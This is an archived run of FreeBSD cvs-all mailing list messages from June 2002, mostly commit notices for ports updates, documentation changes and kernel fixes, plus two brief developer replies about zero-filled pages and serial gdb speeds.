"unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 15:31:57 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E20BC37B435; Wed, 19 Jun 2002 15:31:53 -0700 (PDT) Received: (from scop@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JMVr016772; Wed, 19 Jun 2002 15:31:53 -0700 (PDT) (envelope-from scop) Message-Id: <200206192231.g5JMVr016772@freefall.freebsd.org> From: Ville Skyttä Date: Wed, 19 Jun 2002 15:31:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/books/handbook/pgpkeys chapter.sgml pgpkeys.ent X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG scop 2002/06/19 15:31:53 PDT Modified files: en_US.ISO8859-1/books/handbook/pgpkeys chapter.sgml pgpkeys.ent Log: Add my key to the handbook. Reviewed by: knu (mentor) Approved by: knu (mentor) Revision Changes Path 1.159 +5 -0 doc/en_US.ISO8859-1/books/handbook/pgpkeys/chapter.sgml 1.34 +1 -0 doc/en_US.ISO8859-1/books/handbook/pgpkeys/pgpkeys.ent To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 15:51:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A2C4B37B411; Wed, 19 Jun 2002 15:51:55 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JMptk18991; Wed, 19 Jun 2002 15:51:55 -0700 (PDT) (envelope-from marcus) Message-Id: <200206192251.g5JMptk18991@freefall.freebsd.org> From: Joe Marcus Clarke Date: Wed, 19 Jun 2002 15:51:55 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-wm/metacity-setup Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/19 15:51:55 PDT Modified files: x11-wm/metacity-setup Makefile Log: Promote my marcuscom mirror since the distfile at the primary master site has changed, and the new tarball is missing a few parts. Hopefully, 0.5.2 will be out tomorrow. Reported by: many Revision Changes Path 1.10 +2 -2 ports/x11-wm/metacity-setup/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 16: 8:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6165C37B410; Wed, 19 Jun 2002 16:08:30 -0700 (PDT) Received: (from arr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JN8UV24816; Wed, 19 Jun 2002 16:08:30 -0700 (PDT) (envelope-from arr) Message-Id: <200206192308.g5JN8UV24816@freefall.freebsd.org> From: "Andrew R. Reiter" Date: Wed, 19 Jun 2002 16:08:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: www/en/smp index.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG arr 2002/06/19 16:08:30 PDT Modified files: en/smp index.sgml Log: - Some task reorganization: - Turn the kernel linker locking task into two different ones, locking the globals and locking down linker_file_t's. - Mark the globals task as done. - Mark the linker_file_t's task as WIP. Revision Changes Path 1.85 +10 -3 www/en/smp/index.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 16:13:37 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 48F5037B401; Wed, 19 Jun 2002 16:13:31 -0700 (PDT) Received: (from mike@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JNDV925625; Wed, 19 Jun 2002 16:13:31 -0700 (PDT) (envelope-from mike) Message-Id: <200206192313.g5JNDV925625@freefall.freebsd.org> From: Mike Barcroft Date: Wed, 19 Jun 2002 16:13:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/articles/contributors article.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mike 2002/06/19 16:13:31 PDT Modified files: en_US.ISO8859-1/articles/contributors article.sgml Log: Remove Chuck Rouillard from the contributors list at his request. Revision Changes Path 1.208 +0 -5 doc/en_US.ISO8859-1/articles/contributors/article.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 16:17:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3DC6F37B40B; Wed, 19 Jun 2002 16:17:54 -0700 (PDT) Received: (from mike@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JNHsG25849; Wed, 19 Jun 2002 16:17:54 -0700 (PDT) (envelope-from mike) Message-Id: <200206192317.g5JNHsG25849@freefall.freebsd.org> From: Mike Barcroft Date: Wed, 19 Jun 2002 16:17:54 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: www/en developers.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mike 2002/06/19 16:17:54 PDT Modified files: en developers.sgml Log: Remove an unused entity. Revision Changes Path 1.18 +1 -2 www/en/developers.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 16:21:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5BBA337B406; Wed, 19 Jun 2002 16:21:24 -0700 (PDT) Received: (from lioux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JNLOL26468; Wed, 19 Jun 2002 16:21:24 -0700 (PDT) (envelope-from lioux) Message-Id: <200206192321.g5JNLOL26468@freefall.freebsd.org> From: Mario Sergio Fujikawa Ferreira Date: Wed, 19 Jun 2002 16:21:24 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/silc-client Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG lioux 2002/06/19 16:21:24 PDT Modified files: net/silc-client Makefile distinfo Log: Update to 0.9.2 Revision Changes Path 1.10 +1 -1 ports/net/silc-client/Makefile 1.8 +1 -1 ports/net/silc-client/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 16:29:56 2002 Delivered-To: cvs-all@freebsd.org Received: from mail.chesapeake.net (chesapeake.net [205.130.220.14]) by hub.freebsd.org (Postfix) with ESMTP id 69EF537B40B; Wed, 19 Jun 2002 16:29:46 -0700 (PDT) Received: from localhost (jroberson@localhost) by mail.chesapeake.net (8.11.6/8.11.6) with ESMTP id g5JNTiP78372; Wed, 19 Jun 2002 19:29:44 -0400 (EDT) (envelope-from jroberson@chesapeake.net) Date: Wed, 19 Jun 2002 19:29:44 -0400 (EDT) From: Jeff Roberson To: Jake Burkholder Cc: Jeff Roberson , , Subject: Re: cvs commit: src/sys/vm vm_kern.c In-Reply-To: <20020619173509.B19831@locore.ca> Message-ID: <20020619192840.D54940-100000@mail.chesapeake.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, 19 Jun 2002, Jake Burkholder wrote: > Apparently, On Wed, Jun 19, 2002 at 01:47:18PM -0700, > Jeff Roberson said words to the effect of; > > > jeff 2002/06/19 13:47:18 PDT > > > > Modified files: > > sys/vm vm_kern.c > > Log: > > Teach kmem_malloc about M_ZERO. > > Does this assume that the pages actually are zero? vm_page_alloc uses > VM_ALLOC_ZERO as a hint, but it may return a garbage filled page if there > aren't any zeroed ones; the caller still has to check PG_ZERO. > > > > > Revision Changes Path > > 1.79 +10 -4 src/sys/vm/vm_kern.c > Good catch. Nothing depended on it yet, but I'll add that in just a moment. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 16:41: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 871E837B401; Wed, 19 Jun 2002 16:40:54 -0700 (PDT) Received: (from gad@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JNesW28379; Wed, 19 Jun 2002 16:40:54 -0700 (PDT) (envelope-from gad) Message-Id: <200206192340.g5JNesW28379@freefall.freebsd.org> From: Garance A Drosehn Date: Wed, 19 Jun 2002 16:40:54 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/lpr/lpd lpd.c printjob.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gad 2002/06/19 16:40:54 PDT Modified files: (Branch: RELENG_4) usr.sbin/lpr/lpd lpd.c printjob.c Log: MFC *: Stop using the depreciated 'union wait' definitions, moving to a more standard handling of wait()-related routines. and Avoid checking WIFEXITED and WTERMSIG in some error situations where the value in wstatus is not related to the process that we care about. [* = 1.34 lpd.c, 1.53->1.54 printjob.c] Revision Changes Path 1.12.2.21 +2 -2 src/usr.sbin/lpr/lpd/lpd.c 1.22.2.29 +25 -23 src/usr.sbin/lpr/lpd/printjob.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 16:48:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E720C37B40C; Wed, 19 Jun 2002 16:48:46 -0700 (PDT) Received: (from gad@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JNmkY29290; Wed, 19 Jun 2002 16:48:46 -0700 (PDT) (envelope-from gad) Message-Id: <200206192348.g5JNmkY29290@freefall.freebsd.org> From: Garance A Drosehn Date: Wed, 19 Jun 2002 16:48:46 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/lpr/lpd printjob.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gad 2002/06/19 16:48:46 PDT Modified files: (Branch: RELENG_4) usr.sbin/lpr/lpd printjob.c Log: MFC 1.55: Fix all the 'return' statements in here to follow style(9). Revision Changes Path 1.22.2.30 +24 -24 src/usr.sbin/lpr/lpd/printjob.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 16:50: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3650C37B403; Wed, 19 Jun 2002 16:49:58 -0700 (PDT) Received: (from jeff@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JNnwl29351; Wed, 19 Jun 2002 16:49:58 -0700 (PDT) (envelope-from jeff) Message-Id: <200206192349.g5JNnwl29351@freefall.freebsd.org> From: Jeff Roberson Date: Wed, 19 Jun 2002 16:49:58 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vm_kern.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jeff 2002/06/19 16:49:58 PDT Modified files: sys/vm vm_kern.c Log: - Move the computation of pflags out of the page allocation loop in kmem_malloc() - zero fill pages if PG_ZERO bit is not set after allocation in kmem_malloc() Suggested by: alc, jake Revision Changes Path 1.80 +21 -17 src/sys/vm/vm_kern.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 16:54:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2F12337B40F; Wed, 19 Jun 2002 16:54:42 -0700 (PDT) Received: (from gad@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JNsg130153; Wed, 19 Jun 2002 16:54:42 -0700 (PDT) (envelope-from gad) Message-Id: <200206192354.g5JNsg130153@freefall.freebsd.org> From: Garance A Drosehn Date: Wed, 19 Jun 2002 16:54:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/lpr/lpd printjob.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gad 2002/06/19 16:54:42 PDT Modified files: (Branch: RELENG_4) usr.sbin/lpr/lpd printjob.c Log: MFC 1.56: Cosmetic improvements to some of the syslog() calls in here. Revision Changes Path 1.22.2.31 +44 -35 src/usr.sbin/lpr/lpd/printjob.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 16:58:20 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2AC1437B407; Wed, 19 Jun 2002 16:58:17 -0700 (PDT) Received: (from gad@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JNwHK30372; Wed, 19 Jun 2002 16:58:17 -0700 (PDT) (envelope-from gad) Message-Id: <200206192358.g5JNwHK30372@freefall.freebsd.org> From: Garance A Drosehn Date: Wed, 19 Jun 2002 16:58:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/lpr/lpd printjob.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gad 2002/06/19 16:58:17 PDT Modified files: (Branch: RELENG_4) usr.sbin/lpr/lpd printjob.c Log: MFC 1.57: Change some "process id" variables from 'int' to 'pid_t', renaming some of them. Also moved a global pid-variable into the only routine that used it. Revision Changes Path 1.22.2.32 +31 -28 src/usr.sbin/lpr/lpd/printjob.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 17:25:49 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5180137B412; Wed, 19 Jun 2002 17:25:44 -0700 (PDT) Received: (from alane@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K0Pi337450; Wed, 19 Jun 2002 17:25:44 -0700 (PDT) (envelope-from alane) Message-Id: <200206200025.g5K0Pi337450@freefall.freebsd.org> From: Alan Eldridge Date: Wed, 19 Jun 2002 17:25:44 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/zope Makefile ports/www/zope/files zope.sh.in X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alane 2002/06/19 17:25:44 PDT Modified files: www/zope Makefile www/zope/files zope.sh.in Log: 1. Redirect stderr to /dev/null as well as stdout in rc.d/zope.sh, so that boot time startup does not fail. 2. Bump PORTREVSION (not in PR). PR: ports/37878 Submitted by: alane Reviewed by: will Approved by: will Revision Changes Path 1.37 +1 -1 ports/www/zope/Makefile 1.4 +2 -1 ports/www/zope/files/zope.sh.in To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 17:48:38 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EE31337B414; Wed, 19 Jun 2002 17:48:35 -0700 (PDT) Received: (from brian@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K0mZW39599; Wed, 19 Jun 2002 17:48:35 -0700 (PDT) (envelope-from brian) Message-Id: <200206200048.g5K0mZW39599@freefall.freebsd.org> From: Brian Somers Date: Wed, 19 Jun 2002 17:48:35 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc/periodic/security 700.kernelmsg X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG brian 2002/06/19 17:48:35 PDT Modified files: (Branch: RELENG_4) etc/periodic/security 700.kernelmsg Log: MFC: Change ``dmesg -a'' to ``dmesg'' PR: 30079 Revision Changes Path 1.1.2.3 +2 -2 src/etc/periodic/security/700.kernelmsg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 18: 3: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from wantadilla.lemis.com (wantadilla.lemis.com [192.109.197.80]) by hub.freebsd.org (Postfix) with ESMTP id 2850637B403; Wed, 19 Jun 2002 18:03:03 -0700 (PDT) Received: by wantadilla.lemis.com (Postfix, from userid 1004) id 8032081461; Thu, 20 Jun 2002 10:33:00 +0930 (CST) Date: Thu, 20 Jun 2002 10:33:00 +0930 From: Greg 'groggy' Lehey To: Bruce Evans Cc: Nick Hibma , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Serial gdb speeds (was: cvs commit: src/sys/pc98/pc98 sio.c src/sys/conf options options.i386 options.ia64 options.pc98 src/sys/dev/sio sio.c sioreg.h) Message-ID: <20020620010300.GB91720@wantadilla.lemis.com> References: <200206182130.g5ILUbI13355@freefall.freebsd.org> <20020619153032.X7788-100000@gamplex.bde.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020619153032.X7788-100000@gamplex.bde.org> User-Agent: Mutt/1.3.99i Organization: The FreeBSD Project Phone: +61-8-8388-8286 Fax: +61-8-8388-8725 Mobile: +61-418-838-708 WWW-Home-Page: http://www.FreeBSD.org/ X-PGP-Fingerprint: 9A1B 8202 BCCE B846 F92F 09AC 22E6 F290 507A 4223 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wednesday, 19 June 2002 at 15:47:21 +1000, Bruce Evans wrote: > On Tue, 18 Jun 2002, Nick Hibma wrote: > >> n_hibma 2002/06/18 14:30:37 PDT >> >> Modified files: >> sys/pc98/pc98 sio.c >> sys/conf options options.i386 options.ia64 >> options.pc98 >> sys/dev/sio sio.c sioreg.h >> Log: >> Make the speed used by gdb over serial settable in the kernel configuration. >> >> This facilitates the use in circumstances where you are using a serial >> console as well. GDB doesn't support anything higher than 9600 baud (19k2 >> if you are lucky), but the console does. > > Previous version reviewed by: bde > > I seem to have missed the main point of this change. I always use gdb > at 115200 bps on i386's (since I don't have anything faster), but > haven't used it recently. Not working at a low speed like 115200 is > a bug somewhere. Correct. It seems to have crept in round the time of the migration to the SMPng code. Since then, I haven't been able to use serial gdb reliably at speeds higher than 9600 bps. Greg -- See complete headers for address and phone numbers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 18:27:43 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0C66337B400; Wed, 19 Jun 2002 18:27:41 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K1RfE47863; Wed, 19 Jun 2002 18:27:41 -0700 (PDT) (envelope-from peter) Message-Id: <200206200127.g5K1RfE47863@freefall.freebsd.org> From: Peter Wemm Date: Wed, 19 Jun 2002 18:27:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/netinet if_ether.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG peter 2002/06/19 18:27:40 PDT Modified files: sys/netinet if_ether.c Log: Solve the 'unregistered netisr 18' information notice with a sledgehammer. Register the ISR early, but do not actually kick off the timer until we see some activity. This still saves us from running the arp timers on a system with no network cards. Revision Changes Path 1.95 +7 -4 src/sys/netinet/if_ether.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 18:32:25 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5E38637B409; Wed, 19 Jun 2002 18:32:20 -0700 (PDT) Received: (from dwcjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K1WKa48712; Wed, 19 Jun 2002 18:32:20 -0700 (PDT) (envelope-from dwcjr) Message-Id: <200206200132.g5K1WKa48712@freefall.freebsd.org> From: "David W. Chapman Jr." Date: Wed, 19 Jun 2002 18:32:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/postfix Makefile distinfo pkg-install pkg-message ports/mail/postfix/scripts configure.postfix X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dwcjr 2002/06/19 18:32:20 PDT Modified files: mail/postfix Makefile distinfo pkg-install pkg-message mail/postfix/scripts configure.postfix Log: Update to 1.1.11 PR: 3954 Submitted by: maintainer Revision Changes Path 1.61 +1 -1 ports/mail/postfix/Makefile 1.31 +3 -3 ports/mail/postfix/distinfo 1.15 +15 -1 ports/mail/postfix/pkg-install 1.2 +3 -2 ports/mail/postfix/pkg-message 1.23 +4 -4 ports/mail/postfix/scripts/configure.postfix To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 18:34: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4CDCC37B408; Wed, 19 Jun 2002 18:34:01 -0700 (PDT) Received: (from dwcjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K1Y1749053; Wed, 19 Jun 2002 18:34:01 -0700 (PDT) (envelope-from dwcjr) Message-Id: <200206200134.g5K1Y1749053@freefall.freebsd.org> From: "David W. Chapman Jr." Date: Wed, 19 Jun 2002 18:34:01 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/postfix-current Makefile distinfo pkg-install ports/mail/postfix-current/scripts configure.postfix X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dwcjr 2002/06/19 18:34:01 PDT Modified files: mail/postfix-current Makefile distinfo pkg-install mail/postfix-current/scripts configure.postfix Log: Update to latest PR: 39543 Submitted by: maintainer Revision Changes Path 1.86 +1 -1 ports/mail/postfix-current/Makefile 1.41 +3 -2 ports/mail/postfix-current/distinfo 1.13 +14 -0 ports/mail/postfix-current/pkg-install 1.36 +6 -6 ports/mail/postfix-current/scripts/configure.postfix To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 18:35:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D96A837B406; Wed, 19 Jun 2002 18:35:05 -0700 (PDT) Received: (from ache@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K1Z5m49335; Wed, 19 Jun 2002 18:35:05 -0700 (PDT) (envelope-from ache) Message-Id: <200206200135.g5K1Z5m49335@freefall.freebsd.org> From: "Andrey A. Chernov" Date: Wed, 19 Jun 2002 18:35:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/apache13 Makefile ports/www/apache13/files patch-ab X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ache 2002/06/19 18:35:05 PDT Modified files: www/apache13 Makefile www/apache13/files patch-ab Log: Don't remove data.default & cgi-bin.default on install Revision Changes Path 1.120 +2 -1 ports/www/apache13/Makefile 1.23 +5 -7 ports/www/apache13/files/patch-ab To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 18:38:38 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6282E37B40B; Wed, 19 Jun 2002 18:38:30 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K1cUa49745; Wed, 19 Jun 2002 18:38:30 -0700 (PDT) (envelope-from marcus) Message-Id: <200206200138.g5K1cUa49745@freefall.freebsd.org> From: Joe Marcus Clarke Date: Wed, 19 Jun 2002 18:38:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/libgtop patch-sysdeps_guile_Makefile.in patch-sysdeps_guile_names_Makefile.in ports/devel/libgtop/files patch-sysdeps_guile_Makefile.in patch-sysdeps_guile_names_Makefile.in X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/19 18:38:30 PDT Added files: devel/libgtop/files patch-sysdeps_guile_Makefile.in patch-sysdeps_guile_names_Makefile.in Removed files: devel/libgtop patch-sysdeps_guile_Makefile.in patch-sysdeps_guile_names_Makefile.in Log: Actually put the patches in the files directory. Submitted by: Mike Harding Pointy hat to: me Revision Changes Path 1.1 +11 -0 ports/devel/libgtop/files/patch-sysdeps_guile_Makefile.in (new) 1.1 +11 -0 ports/devel/libgtop/files/patch-sysdeps_guile_names_Makefile.in (new) 1.2 +0 -11 ports/devel/libgtop/patch-sysdeps_guile_Makefile.in (dead) 1.2 +0 -11 ports/devel/libgtop/patch-sysdeps_guile_names_Makefile.in (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 19: 4:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) 